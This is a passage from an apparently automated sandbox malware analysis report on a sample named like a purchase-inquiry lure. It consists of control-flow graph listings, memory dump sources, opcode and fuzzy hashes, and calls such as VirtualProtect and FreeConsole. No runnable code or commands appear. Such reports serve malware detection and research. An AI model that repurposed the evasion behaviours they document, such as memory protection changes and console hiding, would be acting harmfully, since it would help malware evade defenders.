7ffd9b8c0e11-7ffd9b8c0e49 388->399 389->388 390->381 394 7ffd9b8c0be6-7ffd9b8c0c00 call 7ffd9b8b8c90 390->394 402 7ffd9b8c0e4b-7ffd9b8c0e5d call 7ffd9b8b02a0 399->402 403 7ffd9b8c0e5f 399->403 408 7ffd9b8c0e64-7ffd9b8c0e66 402->408 403->408 414 7ffd9b8c0d16 404->414 415 7ffd9b8c0d06-7ffd9b8c0d14 404->415 405->404 411 7ffd9b8c0e68-7ffd9b8c0e73 408->411 412 7ffd9b8c0e7a-7ffd9b8c0ef1 408->412 411->412 437 7ffd9b8c0fd8-7ffd9b8c0fdf 412->437 438 7ffd9b8c0ef7-7ffd9b8c0f6f 412->438 417 7ffd9b8c0d18-7ffd9b8c0d1d 414->417 415->417 418 7ffd9b8c0d40-7ffd9b8c0d56 417->418 419 7ffd9b8c0d1f-7ffd9b8c0d3e call 7ffd9b8b3908 417->419 426 7ffd9b8c0d58-7ffd9b8c0d63 418->426 427 7ffd9b8c0d6a-7ffd9b8c0d7f call 7ffd9b8bf140 418->427 425 7ffd9b8c0d83-7ffd9b8c0d89 419->425 425->389 429 7ffd9b8c0d8b-7ffd9b8c0d90 425->429 426->427 427->425 429->399 431 7ffd9b8c0d92-7ffd9b8c0dc0 call 7ffd9b8b8c90 call 7ffd9b8b88f0 429->431 431->371 443 7ffd9b8c0dc2-7ffd9b8c0de2 431->443 439 7ffd9b8c0ffc-7ffd9b8c100c 437->439 440 7ffd9b8c0fe1-7ffd9b8c0fee 437->440 452 7ffd9b8c0fcf-7ffd9b8c0fd7 call 7ffd9b8c1024 438->452 453 7ffd9b8c0f71-7ffd9b8c0f77 call 7ffd9b8baa30 438->453 446 7ffd9b8c1012-7ffd9b8c1023 439->446 440->439 445 7ffd9b8c0ff0-7ffd9b8c0ffa 440->445 445->439 452->437 457 7ffd9b8c0f7c-7ffd9b8c0fce 453->457 457->452
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1670378255.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ffd9b8b0000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: x6f/$x6f/
                                                                          • API String ID: 0-3524692040
                                                                          • Opcode ID: c4e2273b221ddd997c052ec2f0771830121e8ac993d03f576aad17dd4ab1ee58
                                                                          • Instruction ID: 07a03b019612da27e76632c77f5667a82b06d2a37358a20c9be05ea44d25f8e1
                                                                          • Opcode Fuzzy Hash: c4e2273b221ddd997c052ec2f0771830121e8ac993d03f576aad17dd4ab1ee58
                                                                          • Instruction Fuzzy Hash: EE727A3061DB4D4FD769EB28C4A04B577E1FF99300B0546BEE48AC72A6DE34E946CB81
                                                                          Function 00007FFD9B8B5AB0 Relevance: 1.6, Strings: 1, Instructions: 349COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1670378255.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ffd9b8b0000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: fish
                                                                          • API String ID: 0-1064584243
                                                                          • Opcode ID: db2798f02d1b48f832891f12c287e572bec2b9d8a3ad20c24142c2425e7ae081
                                                                          • Instruction ID: 4cbf0724508f69e47928eb529577955daadd0f30f3a27b1e7ab44baae179c2a4
                                                                          • Opcode Fuzzy Hash: db2798f02d1b48f832891f12c287e572bec2b9d8a3ad20c24142c2425e7ae081
                                                                          • Instruction Fuzzy Hash: BE91E931B1DA1D0FE76CEB7898754B9B3D1FB59310B01467EE44BC3296EE24B9428B81
                                                                          Function 00007FFD9B8BD511 Relevance: 1.4, Instructions: 1423COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1670378255.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ffd9b8b0000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 9913b86f4533616e2163a5aac24c83467278c3d124331cbc47fe88fc6fc0b602
                                                                          • Instruction ID: 4925671e97d51af4d6226765ec484e5185b53c82def5086900a9ceab0af2e9a8
                                                                          • Opcode Fuzzy Hash: 9913b86f4533616e2163a5aac24c83467278c3d124331cbc47fe88fc6fc0b602
                                                                          • Instruction Fuzzy Hash: 10A2683060DB5A4FE769DF38C4A44A5B7E1FF89301B1545BED48AC72A2DE34E946CB80
                                                                          Function 00007FFD9B8BA200 Relevance: .9, Instructions: 919COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1670378255.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ffd9b8b0000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: f0c2b06de95dbee1ae3e683a59344763ef98003cd555492227cdee767cce2016
                                                                          • Instruction ID: abef869682d28f11671815bbb35297065e0d29bcfd286ee4fa13aab2dce068c7
                                                                          • Opcode Fuzzy Hash: f0c2b06de95dbee1ae3e683a59344763ef98003cd555492227cdee767cce2016
                                                                          • Instruction Fuzzy Hash: 6F52F930B09A1D4FDBA8DB68D465A7977E1FF58301F1501BEE04EC36A2DE24ED428B81
                                                                          Function 00007FFD9B8B0620 Relevance: .6, Instructions: 558COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1670378255.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ffd9b8b0000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 9bf342b64b0ff932ada13122418f46e208a157e887db4ca4c872d675f8f46c5e
                                                                          • Instruction ID: 56b02c09f5435df91861d2ed920cdef8ea1b7bb62a4cc2161a30ae03bf758b98
                                                                          • Opcode Fuzzy Hash: 9bf342b64b0ff932ada13122418f46e208a157e887db4ca4c872d675f8f46c5e
                                                                          • Instruction Fuzzy Hash: B4227071E1962E8FEBA8DF64C8657A9B7B1FF49300F1101BAD01D97295CB356A81CF40
                                                                          Function 00007FFD9B8BD130 Relevance: .4, Instructions: 440COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1670378255.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ffd9b8b0000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 532a111537e20189ebdcc29fec5320e08c8fbaac493048190b61f516820b76a4
                                                                          • Instruction ID: 8333431bd690e5ba1b107b481581d7af2f42f6572c29d42dc60e912e5f82e723
                                                                          • Opcode Fuzzy Hash: 532a111537e20189ebdcc29fec5320e08c8fbaac493048190b61f516820b76a4
                                                                          • Instruction Fuzzy Hash: 18D18C3160DB9A4FE32DCB3884A11B5B7E1FFD9301B05467EE4C6C72A1DA24E546CB81
                                                                          Function 00007FFD9B8C6478 Relevance: .2, Instructions: 151COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1670378255.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ffd9b8b0000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 0fa189c5ad23023ead5d3297d6cd2b95c208bc2d9b3f597b7f8cdae61b6d7d58
                                                                          • Instruction ID: 0214164435ad8343cea8d1b5c1f50a045f2a15c75ec9f0e1d8d93c78361ea34f
                                                                          • Opcode Fuzzy Hash: 0fa189c5ad23023ead5d3297d6cd2b95c208bc2d9b3f597b7f8cdae61b6d7d58
                                                                          • Instruction Fuzzy Hash: 3941777160D7890FC31E9B7488211B27BA1EB57310B1682BFD487CB1E7EC28AD468392
                                                                          Function 00007FFD9B98026B Relevance: 2.4, Strings: 1, Instructions: 1113COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 542 7ffd9b98026b-7ffd9b98026d 543 7ffd9b9803b1-7ffd9b9803b7 542->543 544 7ffd9b98026e-7ffd9b98027c 542->544 549 7ffd9b9803b9-7ffd9b9803c8 543->549 545 7ffd9b980284-7ffd9b980286 544->545 547 7ffd9b980288-7ffd9b980289 545->547 548 7ffd9b9802f7-7ffd9b980306 545->548 550 7ffd9b98024f-7ffd9b980255 547->550 551 7ffd9b98028b 547->551 552 7ffd9b980307-7ffd9b980309 548->552 553 7ffd9b9803c9-7ffd9b980427 549->553 556 7ffd9b9801f2-7ffd9b980222 550->556 557 7ffd9b980257-7ffd9b98026a 550->557 551->552 555 7ffd9b98028d 551->555 552->543 558 7ffd9b98030a-7ffd9b980348 552->558 569 7ffd9b98045c-7ffd9b980474 553->569 570 7ffd9b980429-7ffd9b980440 553->570 560 7ffd9b9802d4 555->560 561 7ffd9b98028f-7ffd9b9802a0 555->561 556->543 562 7ffd9b980228-7ffd9b980231 556->562 557->542 558->549 583 7ffd9b98034a-7ffd9b98034d 558->583 560->543 568 7ffd9b9802da-7ffd9b9802f5 560->568 567 7ffd9b980233-7ffd9b98023b 561->567 571 7ffd9b9802a2-7ffd9b9802b8 561->571 562->567 567->543 572 7ffd9b98023c-7ffd9b98024e 567->572 568->548 575 7ffd9b980442-7ffd9b98045a 570->575 576 7ffd9b9804b1-7ffd9b9804b8 570->576 571->543 578 7ffd9b9802be-7ffd9b9802d1 571->578 572->550 575->569 586 7ffd9b9804d1-7ffd9b9804e7 575->586 581 7ffd9b980522-7ffd9b980534 576->581 582 7ffd9b9804ba-7ffd9b9804d0 576->582 578->560 582->586 583->553 587 7ffd9b98034f 583->587 594 7ffd9b98051c-7ffd9b980521 586->594 595 7ffd9b9804e9-7ffd9b980500 586->595 589 7ffd9b980351-7ffd9b98035f 587->589 590 7ffd9b980396-7ffd9b9803b0 587->590 589->590 594->581 596 7ffd9b980502-7ffd9b98051a 595->596 597 7ffd9b980571-7ffd9b980578 595->597 596->594 599 7ffd9b9805e2-7ffd9b9805f4 597->599 600 7ffd9b98057a-7ffd9b980590 597->600 603 7ffd9b980592-7ffd9b980595 600->603 604 7ffd9b980597-7ffd9b9805a7 600->604 603->604 606 7ffd9b9805dc-7ffd9b9805e1 604->606 607 7ffd9b9805a9-7ffd9b9805c0 604->607 606->599 608 7ffd9b9805c2-7ffd9b9805da 607->608 609 7ffd9b980631-7ffd9b980638 607->609 608->606 610 7ffd9b9806a2-7ffd9b9806a8 609->610 611 7ffd9b98063a-7ffd9b980668 609->611 616 7ffd9b9806bc-7ffd9b9806c5 610->616 617 7ffd9b9806aa-7ffd9b9806b9 610->617 621 7ffd9b98069d-7ffd9b9806a1 611->621 622 7ffd9b98066a-7ffd9b98067a 611->622 620 7ffd9b9806c6-7ffd9b9806c7 616->620 617->616 621->610 623 7ffd9b98067c-7ffd9b98067e 622->623 624 7ffd9b9806eb-7ffd9b9806f0 622->624 627 7ffd9b980680 623->627 628 7ffd9b9806fa-7ffd9b980708 623->628 625 7ffd9b9806f2-7ffd9b9806f9 624->625 626 7ffd9b980691 624->626 625->628 633 7ffd9b980692-7ffd9b98069c 626->633 627->620 630 7ffd9b980682-7ffd9b980690 627->630 631 7ffd9b980772 628->631 632 7ffd9b98070a-7ffd9b98073c 628->632 630->626 630->633 635 7ffd9b980a42-7ffd9b980a56 631->635 636 7ffd9b980778-7ffd9b980781 631->636 640 7ffd9b980786-7ffd9b98078b 632->640 642 7ffd9b98073e 632->642 633->621 644 7ffd9b980a57-7ffd9b980a90 635->644 639 7ffd9b980783-7ffd9b980785 636->639 639->640 640->635 643 7ffd9b98078c-7ffd9b98079e 640->643 645 7ffd9b980742-7ffd9b98076f 642->645 646 7ffd9b98079f-7ffd9b9807a3 643->646 650 7ffd9b980a92-7ffd9b980ab7 644->650 651 7ffd9b980afa-7ffd9b980b04 644->651 645->631 648 7ffd9b9807a6-7ffd9b9807bd 646->648 649 7ffd9b9807a5 646->649 648->635 655 7ffd9b9807c3-7ffd9b9807d6 648->655 649->645 649->648 656 7ffd9b980aec-7ffd9b980af8 650->656 657 7ffd9b980ab9-7ffd9b980ad0 650->657 652 7ffd9b980b41-7ffd9b980b77 651->652 659 7ffd9b980bac-7ffd9b980bc4 652->659 660 7ffd9b980b79-7ffd9b980b90 652->660 668 7ffd9b9807d8-7ffd9b9807d9 655->668 669 7ffd9b980847-7ffd9b980856 655->669 656->651 657->652 661 7ffd9b980ad2-7ffd9b980aeb 657->661 662 7ffd9b980b92-7ffd9b980bab 660->662 663 7ffd9b980c01-7ffd9b980c50 660->663 661->656 662->659 681 7ffd9b980c52-7ffd9b980c84 663->681 682 7ffd9b980cc1-7ffd9b980cc8 663->682 668->646 674 7ffd9b9807db 668->674 673 7ffd9b980857-7ffd9b980859 669->673 673->635 676 7ffd9b98085a-7ffd9b980872 673->676 674->673 677 7ffd9b9807dd 674->677 692 7ffd9b980874-7ffd9b980877 676->692 693 7ffd9b9808e3-7ffd9b9808f0 676->693 679 7ffd9b980824 677->679 680 7ffd9b9807df-7ffd9b9807f0 677->680 679->635 683 7ffd9b98082a-7ffd9b980845 679->683 680->639 696 7ffd9b9807f2-7ffd9b980808 680->696 684 7ffd9b980d32-7ffd9b980d34 682->684 685 7ffd9b980cca-7ffd9b980cfe 682->685 683->669 694 7ffd9b980d42-7ffd9b980d6e 684->694 695 7ffd9b980d36-7ffd9b980d3f 684->695 700 7ffd9b9808f3 692->700 701 7ffd9b980879 692->701 693->700 695->694 696->635 703 7ffd9b98080e-7ffd9b980821 696->703 700->635 704 7ffd9b9808f9-7ffd9b98090c 700->704 705 7ffd9b9808c0 701->705 706 7ffd9b98087b-7ffd9b9808a2 701->706 703->679 714 7ffd9b98090e-7ffd9b980912 704->714 715 7ffd9b98097d-7ffd9b980990 704->715 709 7ffd9b9808c3-7ffd9b9808e1 705->709 710 7ffd9b9808c2 705->710 706->635 713 7ffd9b9808a8-7ffd9b9808be 706->713 709->693 710->709 713->635 713->705 716 7ffd9b980914 714->716 717 7ffd9b980993 714->717 715->717 718 7ffd9b980974-7ffd9b98097b 716->718 717->635 719 7ffd9b980999-7ffd9b9809b5 717->719 718->715 722 7ffd9b9809d2-7ffd9b9809e6 719->722 723 7ffd9b9809b7-7ffd9b9809cc 719->723 722->644 724 7ffd9b9809e8-7ffd9b9809ed 722->724 723->722 724->718 726 7ffd9b9809ef 724->726 726->635
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1670677825.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ffd9b980000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: A
                                                                          • API String ID: 0-3554254475
                                                                          • Opcode ID: e061f4fe95e53bc049642eb4045608ba86a20c460b1bce62c79466fbcf3e6e99
                                                                          • Instruction ID: 040e8c38f67bccfe2d52176c264d3417d9356650ae752ff9a241c520845f3d2e
                                                                          • Opcode Fuzzy Hash: e061f4fe95e53bc049642eb4045608ba86a20c460b1bce62c79466fbcf3e6e99
                                                                          • Instruction Fuzzy Hash: 1D726971A1FB8A5FE766CB68C8655A87BE0EF51700F0606FED08DCB0A3DA346946C741
                                                                          Function 00007FFD9B8B3740 Relevance: 1.7, APIs: 1, Instructions: 211COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1018 7ffd9b8b3740-7ffd9b8b4906 VirtualProtect 1024 7ffd9b8b4908 1018->1024 1025 7ffd9b8b490e-7ffd9b8b4968 1018->1025 1024->1025
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1670378255.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ffd9b8b0000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c0fb15fe985c33fdd4edd5bf24ee7267efb3a39aec812dd401811e7ec6e4b7b1
                                                                          • Instruction ID: ca855410ca1db984f78c28da4ba38a6b37242fd1597ac4aa0c89975091cd0c76
                                                                          • Opcode Fuzzy Hash: c0fb15fe985c33fdd4edd5bf24ee7267efb3a39aec812dd401811e7ec6e4b7b1
                                                                          • Instruction Fuzzy Hash: 6361907090975C8FDB58DFA8C895AE9BBF0FF1A300F1041AED049972A2DB74A945CF85
                                                                          Function 00007FFD9B8B47A6 Relevance: 1.7, APIs: 1, Instructions: 202memoryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1121 7ffd9b8b47a6-7ffd9b8b47cf 1122 7ffd9b8b47da-7ffd9b8b4906 VirtualProtect 1121->1122 1123 7ffd9b8b47d1-7ffd9b8b47d9 1121->1123 1127 7ffd9b8b4908 1122->1127 1128 7ffd9b8b490e-7ffd9b8b4968 1122->1128 1123->1122 1127->1128
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1670378255.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ffd9b8b0000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: 0d5dafb17b1a3b6319ddce7915fdc72e66b744f8f83f521b70924221c024bde2
                                                                          • Instruction ID: 2acf608d2c841fc0181f1fdfbeab180d1004b55fc532fa06fafa9e09ddefc1fd
                                                                          • Opcode Fuzzy Hash: 0d5dafb17b1a3b6319ddce7915fdc72e66b744f8f83f521b70924221c024bde2
                                                                          • Instruction Fuzzy Hash: A2517F7090874C8FDB58DF68C855BE9BBF0FB5A310F1402AED449E3292DB74A985CB81
                                                                          Function 00007FFD9B8C5D7A Relevance: 1.7, APIs: 1, Instructions: 173memoryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1202 7ffd9b8c5d7a-7ffd9b8c9c07 VirtualProtect 1206 7ffd9b8c9c09 1202->1206 1207 7ffd9b8c9c0f-7ffd9b8c9c5d 1202->1207 1206->1207
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1670378255.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ffd9b8b0000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: 589e6f5076f9fa479f0e32474c5009b4f187664cfbf952e9a8d0c345aac99401
                                                                          • Instruction ID: f151544303ddfb6b3f36b611ed90b3dbf190b23cdcbb284ebd84ee16908fd522
                                                                          • Opcode Fuzzy Hash: 589e6f5076f9fa479f0e32474c5009b4f187664cfbf952e9a8d0c345aac99401
                                                                          • Instruction Fuzzy Hash: 18514C7091861C8FDB58DF98C885BEDBBF1FB59310F10416ED44AE3251DB70A981CB81
                                                                          Function 00007FFD9B8B0A0D Relevance: 1.6, APIs: 1, Instructions: 129COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1339 7ffd9b8b0a0d-7ffd9b8b0a19 1340 7ffd9b8b0a1b-7ffd9b8b0a23 1339->1340 1341 7ffd9b8b0a24-7ffd9b8b0adf FreeConsole 1339->1341 1340->1341 1345 7ffd9b8b0ae7-7ffd9b8b0b2d 1341->1345 1346 7ffd9b8b0ae1 1341->1346 1346->1345
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1670378255.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ffd9b8b0000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.jbxd
                                                                          Similarity
                                                                          • API ID: ConsoleFree
                                                                          • String ID:
                                                                          • API String ID: 771614528-0
                                                                          • Opcode ID: 7170b1d589fb1e4cd46d72328f8bea376acddda3d1aec330fccaeb790c5df911
                                                                          • Instruction ID: 71d2dbf544d9073cd60d6865cdffe9edb1fcc2a57ba2bcc038dad54b98bd3e12
                                                                          • Opcode Fuzzy Hash: 7170b1d589fb1e4cd46d72328f8bea376acddda3d1aec330fccaeb790c5df911
                                                                          • Instruction Fuzzy Hash: 1C418F34A0875C8FDB54DFA8C889BEDBBF0FB1A311F1041AAD049D7252DB74A945CB41
                                                                          Function 00007FFD9B8B04BA Relevance: 1.6, APIs: 1, Instructions: 119COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1348 7ffd9b8b04ba-7ffd9b8b0a80 1351 7ffd9b8b0a88-7ffd9b8b0adf FreeConsole 1348->1351 1352 7ffd9b8b0ae7-7ffd9b8b0b2d 1351->1352 1353 7ffd9b8b0ae1 1351->1353 1353->1352
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1670378255.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ffd9b8b0000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.jbxd
                                                                          Similarity
                                                                          • API ID: ConsoleFree
                                                                          • String ID:
                                                                          • API String ID: 771614528-0
                                                                          • Opcode ID: 1c33fe11f24b4fb623ea540b2fc1b5c9f33731fc83a00bc69aeb2da1f8d65f2a
                                                                          • Instruction ID: f3b48265a86cabe9f69aa6646b10775eeab2eb5e659d0d33d51326bb497cab17
                                                                          • Opcode Fuzzy Hash: 1c33fe11f24b4fb623ea540b2fc1b5c9f33731fc83a00bc69aeb2da1f8d65f2a
                                                                          • Instruction Fuzzy Hash: 98316A74A0871C8FEB58DF98D889BEDB7F0FB19311F10416AD00AE7252DB74A985CB50

                                                                          Non-executed Functions

                                                                          Function 00007FFD9B8B44F5 Relevance: 2.8, Strings: 2, Instructions: 255COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1670378255.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ffd9b8b0000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: FS:$FS:
                                                                          • API String ID: 0-4179540653
                                                                          • Opcode ID: e74bf6787a53a3dbe3e243c2f5c0d68025273587ac8ae0bdc1826d2116911a8b
                                                                          • Instruction ID: de8cf527cd1c5ebb6776c9e647c5911ae4e8126b84d0c0959355f30d6cafa844
                                                                          • Opcode Fuzzy Hash: e74bf6787a53a3dbe3e243c2f5c0d68025273587ac8ae0bdc1826d2116911a8b
                                                                          • Instruction Fuzzy Hash: 4481B430A09A8D8FDBA8DF28C856BE977E1FF59310F14412EE84DC7292DB749945CB81
                                                                          Function 00007FFD9B8B91F2 Relevance: 1.7, Strings: 1, Instructions: 440COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1670378255.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ffd9b8b0000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 1
                                                                          • API String ID: 0-2212294583
                                                                          • Opcode ID: ba25f2859f312bdd66d9c59300b22336a8e2918951884c960f931b3fbb0776e8
                                                                          • Instruction ID: 0166ede28bd95649eab530d32d61a925c1780a9c34dd997a2b57a977d4ad6705
                                                                          • Opcode Fuzzy Hash: ba25f2859f312bdd66d9c59300b22336a8e2918951884c960f931b3fbb0776e8
                                                                          • Instruction Fuzzy Hash: FCD14853A0F6E60BE72657BC6C791F97F90EF5626470A04FBC0988B0E7D809690A87C1
                                                                          Function 00007FFD9B8C58D9 Relevance: .2, Instructions: 201COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1670378255.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ffd9b8b0000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: e3ae4a3856a89dc8cd407d0c3ffa570e35b650e2fd575a999f845d3b4571fbdd
                                                                          • Instruction ID: ee477c574bf451ab53f099f54c71c7c03cb67b62b69060232600af782eac71a8
                                                                          • Opcode Fuzzy Hash: e3ae4a3856a89dc8cd407d0c3ffa570e35b650e2fd575a999f845d3b4571fbdd
                                                                          • Instruction Fuzzy Hash: 40512872A0E3C50FD31A9B7988664B17FA5DF8722070A82FFD0C6CB1A7E515680BC391

                                                                          Execution Graph

                                                                          Execution Coverage:11.5%
                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                          Signature Coverage:0%
                                                                          Total number of Nodes:100
                                                                          Total number of Limit Nodes:9
                                                                          execution_graph 12619 7ffd9b8805d0 12621 7ffd9b8805d5 12619->12621 12620 7ffd9b8805db 12621->12620 12622 7ffd9b880590 VirtualProtect 12621->12622 12623 7ffd9b88090e 12622->12623 12624 7ffd9b8805cd 12625 7ffd9b8805db 12624->12625 12626 7ffd9b880619 12624->12626 12627 7ffd9b880784 12626->12627 12628 7ffd9b880590 VirtualProtect 12626->12628 12629 7ffd9b88090e 12628->12629 12646 7ffd9b880cad 12647 7ffd9b880cbf 12646->12647 12650 7ffd9b8805a0 12647->12650 12649 7ffd9b880ceb 12651 7ffd9b8805a5 12650->12651 12651->12649 12652 7ffd9b884869 VirtualProtect 12651->12652 12653 7ffd9b884908 12652->12653 12653->12649 12595 7ffd9b88433a 12596 7ffd9b884349 12595->12596 12601 7ffd9b883740 12596->12601 12599 7ffd9b883740 VirtualProtect 12600 7ffd9b8844b0 12599->12600 12602 7ffd9b883749 VirtualProtect 12601->12602 12604 7ffd9b884425 12602->12604 12604->12599 12654 7ffd9b8804ba 12655 7ffd9b880a30 FreeConsole 12654->12655 12657 7ffd9b880ae1 12655->12657 12605 7ffd9b881f38 12606 7ffd9b881f5f 12605->12606 12607 7ffd9b880620 VirtualProtect 12606->12607 12608 7ffd9b881f6e 12607->12608 12609 7ffd9b880620 VirtualProtect 12608->12609 12610 7ffd9b882015 12609->12610 12611 7ffd9b880620 VirtualProtect 12610->12611 12612 7ffd9b88211b 12611->12612 12613 7ffd9b880620 VirtualProtect 12612->12613 12614 7ffd9b8821c8 12613->12614 12615 7ffd9b883635 12616 7ffd9b883653 VirtualProtect 12615->12616 12618 7ffd9b884908 12616->12618 12546 7ffd9b880e81 12547 7ffd9b880e8b 12546->12547 12552 7ffd9b880620 12547->12552 12549 7ffd9b880f02 12573 7ffd9b880630 